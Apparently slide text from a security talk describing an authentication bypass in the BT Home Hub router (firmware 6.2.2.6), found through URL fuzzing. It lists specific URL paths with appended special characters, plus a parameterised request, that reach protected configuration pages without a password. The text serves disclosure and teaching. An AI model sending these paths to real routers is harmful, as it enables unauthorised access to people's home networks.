çReal example: BT Home Hub
(tested on firmware 6.2.2.6 )
¼possibly the most popular DSL
router in the UK
çAuth bypass found via URL
fuzzing [link]
çWeb server accepts multiple
representations of URLs, some of which are not checked for
password
çWe append special symbols
after directory name. i.e.:
¼/cgi/b/secpol/cfg/%5C
¼/cgi/b/secpol/cfg//
¼/cgi/b/secpol/cfg/%
¼/cgi/b/secpol/cfg/~
çIf we need to submit
parameters, we append them after double special
symbols: /cgi/b/_wli_/cfg//?ce=1&be=1&l0=4&l1=0